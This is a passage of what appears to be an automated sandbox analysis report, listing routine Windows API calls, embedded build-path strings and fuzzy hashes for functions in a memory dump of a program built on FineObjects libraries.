                                                                                                • Instruction ID: 349bcb337d27e5ec7e4c84dc04f5b6e83acd6295e11ffb058d5139a808becca6
                                                                                                • Opcode Fuzzy Hash: b5257557d9fd11ebdd9a8af3d075f622ff86efe9b438fb4be2420d139b92a60c
                                                                                                • Instruction Fuzzy Hash: D011E070700245ABD7208F18DC05B6AFBA8EF01B14F10421AE855E77D2CBBAA810CB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(00000000), ref: 004360C7
                                                                                                • GetWindow.USER32(00000000,00000004), ref: 004360F6
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 004360D8
                                                                                                • @fO, xrefs: 004360E2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 2353593579-3471680474
                                                                                                • Opcode ID: 2fd0ad544d576d6382b3135075ab6a70493d13ce8a7c80cdb722d95de4806d23
                                                                                                • Instruction ID: b31c3ca7f770db2a537c856dc44e8b8f12859008a752f809b6245708de666795
                                                                                                • Opcode Fuzzy Hash: 2fd0ad544d576d6382b3135075ab6a70493d13ce8a7c80cdb722d95de4806d23
                                                                                                • Instruction Fuzzy Hash: C0014530A40756ABD7349B58CC03B2A77A8EB04B24F00436FF912A77C1EFB998008688
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004172E0
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00417303
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 3448037634-1285152028
                                                                                                • Opcode ID: 221d554e95095c219bfa12dd280ccfadc80f047ba798d7d6fe87bf9bbde15f42
                                                                                                • Instruction ID: f3f799c9cd63815602f8363dff05ebe4d0a11c4fca0164d6253156edc93477c4
                                                                                                • Opcode Fuzzy Hash: 221d554e95095c219bfa12dd280ccfadc80f047ba798d7d6fe87bf9bbde15f42
                                                                                                • Instruction Fuzzy Hash: 75110032640A49ABC7109F55CC80BBFFBB8FB45B21F00462EFD10A3281D378A901CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32 ref: 00480111
                                                                                                  • Part of subcall function 00473780: InterlockedDecrement.KERNEL32(?), ref: 004737FA
                                                                                                  • Part of subcall function 00473780: InterlockedDecrement.KERNEL32(?), ref: 00473855
                                                                                                  • Part of subcall function 00473780: InterlockedDecrement.KERNEL32(?), ref: 00473871
                                                                                                  • Part of subcall function 0047F0A0: EnterCriticalSection.KERNEL32 ref: 0047F0CC
                                                                                                  • Part of subcall function 0047F0A0: LeaveCriticalSection.KERNEL32(00534C18), ref: 0047F117
                                                                                                • MessageBoxW.USER32(00000000,?,Fine Objects,?), ref: 0048014C
                                                                                                • LeaveCriticalSection.KERNEL32(00534C18), ref: 00480160
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$DecrementInterlocked$EnterLeave$Message
                                                                                                • String ID: Fine Objects
                                                                                                • API String ID: 871864774-1333118125
                                                                                                • Opcode ID: 07216a0b0c6c143a207342c9203d7217ab0aba2b4d249fe90946d04c94702863
                                                                                                • Instruction ID: 3af611399900edf8de75b5aefa97c5da0f078c1ed8c8bd8272dd05e38d3d64b4
                                                                                                • Opcode Fuzzy Hash: 07216a0b0c6c143a207342c9203d7217ab0aba2b4d249fe90946d04c94702863
                                                                                                • Instruction Fuzzy Hash: F801D631604254ABC7109B98CC09BADBFB5FB46735F104369F82DA73D1C7B85900CBA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Window
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\unicodecomboboxawl.cpp
                                                                                                • API String ID: 2353593579-2663756660
                                                                                                • Opcode ID: a9d994137c93816f31314425c5599797acaba3c6675211c40c5d7abdd16de13d
                                                                                                • Instruction ID: 867fc0af24a7e70cef6b9dfb82bb1cf62c10c0743785726289cabbedfefc1263
                                                                                                • Opcode Fuzzy Hash: a9d994137c93816f31314425c5599797acaba3c6675211c40c5d7abdd16de13d
                                                                                                • Instruction Fuzzy Hash: 4C01D63178031427FA205A1A5C43BBB721CAB90B11F44016FBE18EB2C1EAF9AA10C1AD
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • WaitForMultipleObjects.KERNEL32(00000040,00000000,00000001,000000FF,00000001,004A38A2,?,?,004A0285), ref: 004A01CC
                                                                                                • GetLastError.KERNEL32(?,?,004A0285), ref: 004A01D3
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 004A01E2
                                                                                                • d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\threadowner.cpp, xrefs: 004A01D8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterErrorException@8LastLeaveMultipleObjectsThrowWait
                                                                                                • String ID: @fO$d:\build.agent\teamagent\_work\1\s\build\0\finenet\finenet\threadowner.cpp
                                                                                                • API String ID: 546067126-3199729829
                                                                                                • Opcode ID: 4fbde55f2567f5592b5f03f9ecabc5ed060102b99f5babcbb1dd561bd57663a1
                                                                                                • Instruction ID: b298272dd13d1cfffa23d42bdc8b111e2b5106a0832ef0c81eb9651a294ba6b4
                                                                                                • Opcode Fuzzy Hash: 4fbde55f2567f5592b5f03f9ecabc5ed060102b99f5babcbb1dd561bd57663a1
                                                                                                • Instruction Fuzzy Hash: FDF02231B401141BE610666C8C81E7B731ADBD6324F21822BFA28C73C2DE3A8C1082AC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(00535A8C,00000000,?,004DEA56,000000FF,?,0043BE5C,0053011C,00000000,004DF61E,000000FF,?,0043B530,00000008), ref: 004480C1
                                                                                                • GetLastError.KERNEL32(?,0043BE5C,0053011C,00000000,004DF61E,000000FF,?,0043B530,00000008), ref: 004480CB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CountCriticalErrorInitializeLastSectionSpin
                                                                                                • String ID: |ZS$|ZS
                                                                                                • API String ID: 439134102-2760894310
                                                                                                • Opcode ID: 05883fb1f2ec455a26aa08c3f7ab9834c5a1400ac90b4d63bbb57a15f5f907f5
                                                                                                • Instruction ID: 8777f051d41962b2e5f6e214ce90be17b023e7c6e96b9f62492ed5185003e45d
                                                                                                • Opcode Fuzzy Hash: 05883fb1f2ec455a26aa08c3f7ab9834c5a1400ac90b4d63bbb57a15f5f907f5
                                                                                                • Instruction Fuzzy Hash: 45118B71A14B449BD311CF68ED9432ABBE0F71471AF10A359E8148BBA0FB794448FB48
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0047B184
                                                                                                • GetLastError.KERNEL32 ref: 0047B18E
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\time.cpp, xrefs: 0047B19A
                                                                                                • @fO, xrefs: 0047B1A4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalFileSectionTimeValue$EnterErrorException@8LastLeaveLocalThrow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\time.cpp
                                                                                                • API String ID: 2643927400-3380053203
                                                                                                • Opcode ID: 253e218fa6780fc0d1fe4931cd62277ca0611a85dcff45c2e95cb8acd1b1a3b8
                                                                                                • Instruction ID: 15e841266e1451a9bdb5da2ac5b215c823bea1729b3a3177b3bda64918c8bd0e
                                                                                                • Opcode Fuzzy Hash: 253e218fa6780fc0d1fe4931cd62277ca0611a85dcff45c2e95cb8acd1b1a3b8
                                                                                                • Instruction Fuzzy Hash: 3C0144715042046BD710EF58D845A9B77ECAB54314F10C62EF968C7381EB75D9148BD6
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • NotifyWinEvent.USER32 ref: 004470D6
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterEventException@8LeaveNotifyThrow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\menubaraccessibilityawl.cpp
                                                                                                • API String ID: 331213172-1054871182
                                                                                                • Opcode ID: d723b21636714183ea9532d57c85563cb459437da190ca3dcbadebfd97226d50
                                                                                                • Instruction ID: 23a65c6f96fdd9a9b4ef98ed2a1521b223b8ed0cf4f9f094d6a98fae0a47e8f0
                                                                                                • Opcode Fuzzy Hash: d723b21636714183ea9532d57c85563cb459437da190ca3dcbadebfd97226d50
                                                                                                • Instruction Fuzzy Hash: CFF0C2367407146BF3205A189C07F2732999744731F21472BBB69E72D2E7F4F8004A88
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0043D193
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0043D1AF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 3448037634-1285152028
                                                                                                • Opcode ID: 27ef30e2d29c3ed150820676445c14ca14cd31da8eb470c4c545bfa2d9485b36
                                                                                                • Instruction ID: 7979fd9a4edffd2f30de6721f0ee67a382c2e624cfdd1263987e6a8d21bd7705
                                                                                                • Opcode Fuzzy Hash: 27ef30e2d29c3ed150820676445c14ca14cd31da8eb470c4c545bfa2d9485b36
                                                                                                • Instruction Fuzzy Hash: 6E01AD32500A41AFC7219F19CC05B6BFBF9FF49B20F000A2EF89193791D7B8A8008B85
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(Advapi32.dll,00000000,0044A115,00000000,00000000,00000000), ref: 0044919D
                                                                                                • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedW), ref: 004491AD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressHandleModuleProc
                                                                                                • String ID: Advapi32.dll$RegCreateKeyTransactedW
                                                                                                • API String ID: 1646373207-2994018265
                                                                                                • Opcode ID: f38f588debcbe750d9894c3318df46779accab891d59993989166f163964078d
                                                                                                • Instruction ID: 059940d2ef3e136932a458fc1766d343dacdcc95fda7cbc78119a9b05e88c982
                                                                                                • Opcode Fuzzy Hash: f38f588debcbe750d9894c3318df46779accab891d59993989166f163964078d
                                                                                                • Instruction Fuzzy Hash: 74016D31258301BBF7205F44EC09F5BBAE1BB84B01F04481EF5805A1D1C3F999A4DF95
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetVersionExW.KERNEL32(00534020,00415AE9), ref: 00474348
                                                                                                • InterlockedExchange.KERNEL32(0053401C,00000001), ref: 00474378
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 00474362
                                                                                                • d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp, xrefs: 00474358
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterException@8ExchangeInterlockedLeaveThrowVersion
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\fineobjects\src\fineobjects.cpp
                                                                                                • API String ID: 417680594-2274833300
                                                                                                • Opcode ID: b4c572e05457276415c5afd88e13f5687e3dd20d89c5dcc007d6d2c496e1630b
                                                                                                • Instruction ID: 91cb11f893471f01d05f1e46cd472db82b78aed8e699f3df6258d82f59fd2ed2
                                                                                                • Opcode Fuzzy Hash: b4c572e05457276415c5afd88e13f5687e3dd20d89c5dcc007d6d2c496e1630b
                                                                                                • Instruction Fuzzy Hash: F5F0623478020497DB346B516D8A7BB3762A3E1752F84805BFA4C8D3D1C3796845EE0D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0043D0F6
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0043D112
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 3448037634-1285152028
                                                                                                • Opcode ID: 5e51f3cf47b73d6bae09b919dbe2283e71b3fb1605d82564d769aaac5102a825
                                                                                                • Instruction ID: d54ea8241056acee9ea7e75818d4788cdb3b00913b72b47135fafedc1458cee9
                                                                                                • Opcode Fuzzy Hash: 5e51f3cf47b73d6bae09b919dbe2283e71b3fb1605d82564d769aaac5102a825
                                                                                                • Instruction Fuzzy Hash: 36F06232540E55ABC7219F1ADC05B6BFBEDFF49B21F000A2EF84193751D778A8018AD5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 004501D7
                                                                                                • PostMessageW.USER32(?,?,00000000,00000000), ref: 00450209
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 004501E8
                                                                                                • @fO, xrefs: 004501F2
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessagePostWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 3618638489-3471680474
                                                                                                • Opcode ID: f0ad8651ed81505dc12a0c3a130d47287009c063c2235b33225ef950acad70fc
                                                                                                • Instruction ID: f5caf9e7028ae62c799713cf35d625a19088df309baba1623464f168571bf33f
                                                                                                • Opcode Fuzzy Hash: f0ad8651ed81505dc12a0c3a130d47287009c063c2235b33225ef950acad70fc
                                                                                                • Instruction Fuzzy Hash: 44E06D317403106BEA301B259C0AF2BA658DB80F12F19402FB902FA6D2EAE5EC108658
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 00436170
                                                                                                • @fO, xrefs: 0043617A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: MessagePostWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl
                                                                                                • API String ID: 3618638489-3471680474
                                                                                                • Opcode ID: 318a9561f24cbdd69ac8e998500d4cc16047d32a54a1dd8cacceae1fc2ca0752
                                                                                                • Instruction ID: 70a281ca454c4f61a5077a2339123d7a2e712c412fe660e19ed02a04309e75ed
                                                                                                • Opcode Fuzzy Hash: 318a9561f24cbdd69ac8e998500d4cc16047d32a54a1dd8cacceae1fc2ca0752
                                                                                                • Instruction Fuzzy Hash: F6E030357403136BEB209F64CC06F3B7694AF98B01F059D2EB996E5592D765C8208649
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\menubaraccessibilityawl.cpp, xrefs: 00447040
                                                                                                • @fO, xrefs: 0044704A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: EventNotifyWindow
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\menubaraccessibilityawl.cpp
                                                                                                • API String ID: 3886080106-658324997
                                                                                                • Opcode ID: 44d36f617cd2025f95385abbac20a792bebdbbd0356fd854ff0c0a7b9c5c58b5
                                                                                                • Instruction ID: 217ea9787251aab924822dc4bcdd21d96f9c05ef72b5e3b7b934030d5a6cb400
                                                                                                • Opcode Fuzzy Hash: 44d36f617cd2025f95385abbac20a792bebdbbd0356fd854ff0c0a7b9c5c58b5
                                                                                                • Instruction Fuzzy Hash: 5CE09230345311ABF7306B29AD06F2336989B44B50F15441BB619DB2D2EBA8D8118A8C
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • RestoreDC.GDI32(?,00000000), ref: 0044B1F3
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalSectionValue$EnterException@8LeaveRestoreThrow
                                                                                                • String ID: @fO$@fO$d:\build\teamagent\_work\1\s\0\awl\src\dcawl.cpp
                                                                                                • API String ID: 3016902576-3119660030
                                                                                                • Opcode ID: bc9f9adec630ce2428ddd2b79d79e508ef2955817124a1176f62666d54e72e7d
                                                                                                • Instruction ID: 37f14b982b10453abbcb36c1f8e964953f8c7a3e5e8527352434c06a8725b7b8
                                                                                                • Opcode Fuzzy Hash: bc9f9adec630ce2428ddd2b79d79e508ef2955817124a1176f62666d54e72e7d
                                                                                                • Instruction Fuzzy Hash: 43F06571680314ABF7342B14AD07B3735A1EB00B05F51882FB681A62C5EBFD9450464D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\inc\windowawl.inl, xrefs: 0043F2C0
                                                                                                • @fO, xrefs: 0043F2CA
                                                                                                Memory Dump Source
